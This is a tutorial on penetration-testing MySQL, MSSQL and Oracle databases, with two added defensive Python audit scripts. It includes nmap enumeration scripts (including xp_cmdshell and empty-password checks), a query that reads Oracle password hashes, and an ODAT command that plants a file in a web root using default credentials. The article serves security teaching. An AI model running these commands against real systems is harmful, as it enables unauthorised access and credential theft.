MySQL, MSSQL & Oracle Database Security Tactics
In the ever-evolving landscape of cybersecurity, understanding the intricacies of database exploitation is critical for both attackers and defenders. Databases are the lifeblood of modern applications, and their misconfiguration or vulnerabilities can lead to devastating breaches. This article delves into practical techniques for interacting with MySQL, MSSQL, and Oracle databases, focusing on their configurations, commands, and tools that can be leveraged for penetration testing or forensic investigations.
MySQL
Key Port and Configuration
MySQL servers typically operate on port 3306, making it a prime target for attackers scanning networks. To install MySQL on a Linux system, use:
sudo apt install mysql-server -y
Configuration files for MySQL are usually located at /etc/mysql/mysql.conf.d/mysqld.cnf. To view this file without comments or blank lines:
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'
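From the defender's side, the same file can be checked for settings that widen exposure of port 3306. The following Python script is an added example, not part of the original article; the sample file contents are constructed, and the four options it checks are this example's own selection.

```python
import ipaddress

OFF = ("0", "off", "false")
# Constructed sample of /etc/mysql/mysql.conf.d/mysqld.cnf (not from a real host).
SAMPLE_CNF = """\
# The MySQL database server configuration file.
[mysqld]
port            = 3306
bind-address    = 0.0.0.0   # listen on every interface
local_infile    = 1
secure-file-priv = ""
skip-grant-tables
[client]
port = 3306
"""

def parse_mysqld(text):
    """Return the [mysqld] options; '-' and '_' in option names are equivalent."""
    opts, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments, then skip blanks
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "mysqld":
            key, _, value = line.partition("=")   # bare options get an empty value
            opts[key.strip().lower().replace("-", "_")] = value.strip().strip("\"'")
    return opts

def audit(opts):
    findings = []
    bind = opts.get("bind_address", "*")          # unset means all interfaces
    for addr in (a.strip() for a in bind.split(",")):
        try:
            loopback = ipaddress.ip_address(addr).is_loopback
        except ValueError:                        # "*" or a hostname
            loopback = addr.lower() == "localhost"
        if not loopback:
            findings.append(f"bind-address {addr}: port {opts.get('port', '3306')} reachable off-host")
    if "skip_grant_tables" in opts and opts["skip_grant_tables"].lower() not in OFF:
        findings.append("skip-grant-tables: authentication is disabled")
    if "local_infile" in opts and opts["local_infile"].lower() not in OFF:
        findings.append("local_infile enabled: LOAD DATA LOCAL permitted")
    if opts.get("secure_file_priv") == "":
        findings.append("secure_file_priv empty: no directory restriction on file import/export")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(parse_mysqld(SAMPLE_CNF))))
```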
Connecting to MySQL
To connect to a MySQL server remotely, use:
mysql -u <user> -p<password> -h <IP address>
Note: There should be no space between the -p flag and the password. For example:
mysql -u root -pP4SSw0rd -h 10.129.14.128
Once connected, these commands are essential for database exploration:
- show databases; – Lists all available databases.
- use <database>; – Switches to a specific database.
- show tables; – Displays all tables within the selected database.
- show columns from <table>; – Reveals column names in a table.
- select * from <table>; – Retrieves all data from a table.
- select * from <table> where <column> = "<string>"; – Searches for specific data in a column.
The system schema (sys) and information schema (information_schema) are critical databases that hold metadata about the server’s structure and operations.
Scanning MySQL Servers
To enumerate MySQL services on a target machine, leverage Nmap with the following command:
sudo nmap 10.129.14.128 -sV -sC -p3306 --script "mysql*"
MSSQL: Microsoft’s Enterprise Database
Key Port and Tools
MSSQL operates on port 1433, which is often targeted during reconnaissance. To gather information about an MSSQL server, use Nmap with specialised scripts:
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell \
--script-args mssql.instance-port=1433,mssql.username=sa,mssql.password= \
-sV -p 1433 10.129.201.248
For deeper enumeration, Metasploit offers an auxiliary scanner called mssql_ping, which can provide additional insights into MSSQL instances.
Connecting to MSSQL
Python’s Impacket library includes a powerful tool for MSSQL interaction:
python3 mssqlclient.py <user>@<IP address> -windows-auth
Once connected, you can list all databases with:
select name from sys.databases;
Oracle Databases: The Legacy Powerhouse
Key Port and Configuration
Oracle databases utilise port 1521 for their Transparent Network Substrate (TNS) listener service. Configuration files such as tnsnames.ora and listener.ora are typically found in the $ORACLE_HOME/network/admin directory.
Oracle’s default credentials (e.g., CHANGE_ON_INSTALL, dbsnmp) are infamous for being left unchanged in poorly managed environments, making them an easy opportunity during penetration tests.
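The three listener ports named in this article (3306, 1433 and 1521) can be checked on a host you administer before a scanner finds them. The following Python script is an added example, not part of the original article; it assumes its input is the output of `ss -ltnH`, and the sample lines are constructed.

```python
import ipaddress

DB_PORTS = {3306: "MySQL", 1433: "MSSQL", 1521: "Oracle TNS listener"}

# Constructed sample of `ss -ltnH` output (not captured from a real host).
SAMPLE_SS = """\
LISTEN 0      151        127.0.0.1:3306       0.0.0.0:*
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
LISTEN 0      128          0.0.0.0:1433       0.0.0.0:*
LISTEN 0      128             [::]:1521          [::]:*
LISTEN 0      70             [::1]:3306          [::]:*
LISTEN 0      128    10.0.0.5%eth0:1521       0.0.0.0:*
"""

def is_loopback(host):
    host = host.strip("[]").split("%", 1)[0]   # drop IPv6 brackets and %interface suffix
    if host == "*":
        return False                           # wildcard: every interface
    return ipaddress.ip_address(host).is_loopback

def exposed_db_listeners(ss_output):
    """Return (service, address, port) for database ports bound off-loopback."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue                           # header or unrelated line
        host, _, port = fields[3].rpartition(":")
        if not port.isdigit() or int(port) not in DB_PORTS:
            continue
        if not is_loopback(host):
            exposed.append((DB_PORTS[int(port)], host, int(port)))
    return exposed

if __name__ == "__main__":
    for service, host, port in exposed_db_listeners(SAMPLE_SS):
        print(f"{service} listening on {host}:{port}")
```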
Essential Commands
After establishing a connection via SQL*Plus or tools like ODAT (Oracle Database Attacking Tool), these commands prove invaluable:
- select table_name from all_tables; – Lists all tables accessible by the user.
- select * from user_role_privs; – Displays roles assigned to the user.
- select name, password from sys.user$; – Accesses user credentials (requires elevated privileges).
Setting Up Oracle Tools
For penetration testers working with Oracle databases, setting up ODAT is straightforward:
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init && git submodule update
wget https://download.oracle.com/.../instantclient-basic-linux.x64.zip
unzip instantclient-basic-linux.x64.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
To test if ODAT is functioning correctly:
./odat.py -h
Exploiting File Upload Vulnerabilities
One notable Oracle vulnerability involves uploading files to the server using UTL_FILE functionality:
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://10.129.204.235/testing.txt
Conclusion: The Stakes of Database Security
Databases like MySQL, MSSQL, and Oracle form the backbone of countless applications worldwide, but they also represent significant attack surfaces when mis-configured or left unpatched. As demonstrated above, understanding how these systems function at a granular level is crucial for both offensive and defensive security professionals.
Whether you’re scanning networks with Nmap or diving deep into schema structures with SQL commands, always remember: knowledge is power, but with great power comes great responsibility. Misuse of these techniques could lead to severe legal consequences, so ensure your activities are authorised and ethical.
By securing these critical systems today, we can prevent tomorrow’s breaches, because in cybersecurity it’s not if you’ll be targeted but when.